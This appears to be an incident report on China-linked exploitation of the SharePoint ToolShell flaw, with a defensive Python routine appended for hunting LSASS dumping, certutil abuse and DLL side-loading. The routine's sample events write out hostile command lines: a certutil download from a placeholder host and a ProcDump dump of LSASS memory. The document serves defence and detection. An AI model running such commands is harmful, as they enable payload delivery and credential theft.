Full Report
Hackers believed to be associated with China have leveraged the ToolShell vulnerability (CVE-2025-53770) in Microsoft SharePoint in attacks targeting government agencies, universities, telecommunication service providers, and finance organizations. [...]
Analysis Summary
# Incident Report: Widespread Exploitation of SharePoint ToolShell Vulnerability (CVE-2025-53770)
## Executive Summary
Cyber actors, believed to be associated with China, leveraged the actively exploited zero-day vulnerability CVE-2025-53770 (ToolShell) in unpatched Microsoft SharePoint servers to gain remote, unauthenticated code execution across various sectors globally. The attacks, which began around July 20, 2025, impacted government agencies, universities, telecom providers, and financial institutions across four continents. Microsoft responded with emergency patches; post-exploitation activity nonetheless involved multi-stage malware deployment, including custom backdoors and standard post-exploitation tools.
## Incident Details
- Discovery Date: July 20, 2025 (Date the zero-day was disclosed/actively exploited)
- Incident Date: Beginning around July 20, 2025
- Affected Organization: Government agencies, universities, telecommunication service providers, and finance organizations across the Middle East, South America, the U.S., and Africa.
- Sector: Government, Education, Telecommunications, Finance
- Geography: Worldwide (four continents: the Middle East, South America, the U.S., and Africa), plus at least one European finance company mentioned.
## Timeline of Events
### Initial Access
- Date/Time: Starting July 20, 2025 (Exploitation disclosed/began)
- Vector: Exploitation of **CVE-2025-53770 (ToolShell)** in on-premise Microsoft SharePoint servers.
- Details: This vulnerability bypasses protections related to CVE-2025-49706 and CVE-2025-49704, allowing unauthenticated remote code execution (RCE) and full file system access. Targeting of a Middle Eastern telecom firm began specifically on July 21, 2025.
### Lateral Movement
- Details: Attackers performed credential dumping using tools like **ProcDump, Minidump, and LsassDumper**. They leveraged **PetitPotam (CVE-2021-36942)** for domain compromise.
### Data Exfiltration/Impact
- Details: Data collection involved using the **Renecks utility** (which supports data exfiltration), system information gathering, and potentially the theft of credentials. The ultimate impact involved establishing a long-term foothold using advanced malware frameworks.
### Detection & Response
- Date/Time: July 21, 2025 (Microsoft released emergency updates). Organizations like Symantec began detailed reporting later.
- Details: Microsoft issued emergency updates the day after the flaw was disclosed. Symantec tracked the ongoing campaign, noting the use of malware associated with the known Chinese threat group Salt Typhoon.
## Attack Methodology
- Initial Access: **CVE-2025-53770 (ToolShell)** for unauthenticated RCE.
- Persistence: **Webshells** planted immediately after initial access, followed by the deployment of the **Zingdoor** backdoor and use of the **Renecks utility**.
- Privilege Escalation: No dedicated technique is reported; elevated access was implicitly obtained through the RCE and full file system access gained at initial entry, and potentially extended through the subsequent credential dumping.
- Defense Evasion: **DLL side-loading** using legitimate executables (Trend Micro and BitDefender files) to conceal malicious activity.
- Credential Access: **ProcDump, Minidump, and LsassDumper** used for credential harvesting.
- Discovery: Attackers utilized the **GoGo Scanner** (a red-team scanning engine).
- Lateral Movement: **PetitPotam (CVE-2021-36942)** for domain compromise.
- Collection: **Zingdoor** backdoor used for system info collection and file operations.
- Exfiltration: **Renecks utility** used to allow data exfiltration.
- Impact: Deployment of the **ShadowPad Trojan** and the **KrustyLoader** tool, which subsequently deployed the **Sliver** open-source post-exploitation framework.
## Impact Assessment
- Financial: (Not explicitly stated, but implied significant costs for remediation and potential downtime/regulatory fines).
- Data Breach: System information gathered; sensitive data likely accessed during credential dumping and exfiltration targeting entities in government, finance, and telecom sectors.
- Operational: Disruption due to webshell deployment and introduction of sophisticated backdoors (ShadowPad, Sliver).
- Reputational: High risk due to targeting of government and core infrastructure providers.
## Indicators of Compromise
- **Network indicators:** No specific addresses or domains are given; relevant traffic is Sliver C2 communication and commands issued through the Renecks utility.
- **File indicators:** Webshells, Zingdoor backdoor (Go-based), KrustyLoader (Rust-based), Sliver framework components.
- **Behavioral indicators:** DLL side-loading using Trend Micro/BitDefender executables, use of `certutil.exe`, execution of ProcDump/LsassDumper.
## Response Actions
- Containment measures: Not detailed in the report; implied actions include isolating affected SharePoint servers and patching immediately (Microsoft released patches the day after disclosure).
- Eradication steps: Removal of planted webshells, identification and termination of associated malware processes (Zingdoor, KrustyLoader, Sliver), and analysis of compromised file systems.
- Recovery actions: Full restoration of SharePoint farm integrity, potentially rebuilding compromised systems, and mandatory password resets following credential dumping.
## Lessons Learned
- The vulnerability management program failed to protect against a critical, actively exploited zero-day (CVE-2025-53770) which allowed unauthenticated RCE.
- Attackers are utilizing multiple linked Chinese threat group toolsets (Budworm, Sheathminer, Storm-2603) in coordinated, sophisticated campaigns.
- Sophisticated evasion tactics, such as DLL side-loading using legitimate vendor software, are effective at bypassing standard endpoint controls.
## Recommendations
- Immediately apply the emergency patches released by Microsoft for CVE-2025-53770 and related flaws across all on-premise SharePoint environments.
- Implement strict network segmentation for all public-facing servers, especially SharePoint, to limit lateral movement potential should initial access occur.
- Enhance monitoring for anomalous process execution chained with legitimate vendor executables (e.g., monitoring for DLL loading from non-standard directories).
- Conduct thorough threat-hunting across the enterprise for known indicators associated with Salt Typhoon tooling (Zingdoor, Sliver).
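A hunting routine over constructed Sysmon-style process-create and image-load events, added here as an example (not from the original report or any vendor) to illustrate the behavioral indicators listed above and the monitoring recommendation: LSASS dumping, certutil download/decode usage, and a vendor-signed executable loading a DLL from a non-standard directory. Field names, executable names, paths and signer values are constructed assumptions.

```python
import ntpath

# Directories from which a signed vendor binary is expected to load its DLLs (assumed list).
TRUSTED_DLL_ROOTS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                     "c:\\program files\\", "c:\\program files (x86)\\")
LSASS_DUMPERS = {"procdump.exe", "procdump64.exe", "lsassdumper.exe"}
CERTUTIL_ABUSE_FLAGS = {"-urlcache", "-decode", "-encode"}  # real certutil switches

def check_process_create(ev):
    """Return a finding for a process-creation event, or None."""
    image = ntpath.basename(ev["Image"]).lower()
    args = ev.get("CommandLine", "").lower().split()
    # Catch known dumpers by name, and renamed copies by their LSASS full-dump arguments.
    if image in LSASS_DUMPERS or ("-ma" in args and any("lsass" in a for a in args)):
        return f"credential dumping against LSASS: {ev['CommandLine']}"
    if image == "certutil.exe" and CERTUTIL_ABUSE_FLAGS & set(args):
        return f"certutil download/decode: {ev['CommandLine']}"
    return None

def check_image_load(ev):
    """Flag a third-party-signed process loading a DLL from outside the trusted
    roots that is not signed by the same vendor (the DLL side-loading pattern)."""
    signer = ev.get("ImageSigner", "")
    if not signer or signer == "Microsoft":
        return None
    dll_dir = ntpath.dirname(ev["ImageLoaded"]).lower() + "\\"
    if dll_dir.startswith(TRUSTED_DLL_ROOTS) or ev.get("DllSigner") == signer:
        return None
    return (f"possible DLL side-loading: {signer}-signed {ev['Image']} loaded "
            f"{ev['ImageLoaded']} (DLL signer: {ev.get('DllSigner') or 'none'})")

def hunt(events):
    """Run the matching check over each event; returns the list of findings."""
    findings = []
    for ev in events:
        check = check_process_create if ev["type"] == "ProcessCreate" else check_image_load
        finding = check(ev)
        if finding:
            findings.append(finding)
    return findings

# Constructed sample events; the vendor binary/DLL names and signers are hypothetical.
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://placeholder.invalid/p.bin p.bin"},
    {"type": "ProcessCreate", "Image": r"C:\Windows\Temp\pd.exe",
     "CommandLine": "pd.exe -accepteula -ma lsass.exe l.dmp"},
    {"type": "ImageLoad", "Image": r"C:\Users\Public\vendorcore.exe", "ImageSigner": "Trend Micro",
     "ImageLoaded": r"C:\Users\Public\vendorlib.dll", "DllSigner": ""},
    {"type": "ImageLoad", "Image": r"C:\Program Files\Vendor\agent.exe", "ImageSigner": "Trend Micro",
     "ImageLoaded": r"C:\Program Files\Vendor\agent.dll", "DllSigner": "Trend Micro"},
    {"type": "ProcessCreate", "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe a.txt"},
]
```

Running `hunt(SAMPLE_EVENTS)` yields three findings: the certutil download, the renamed LSASS dumper, and the side-loaded DLL; the legitimate vendor load from Program Files and the notepad launch are not flagged.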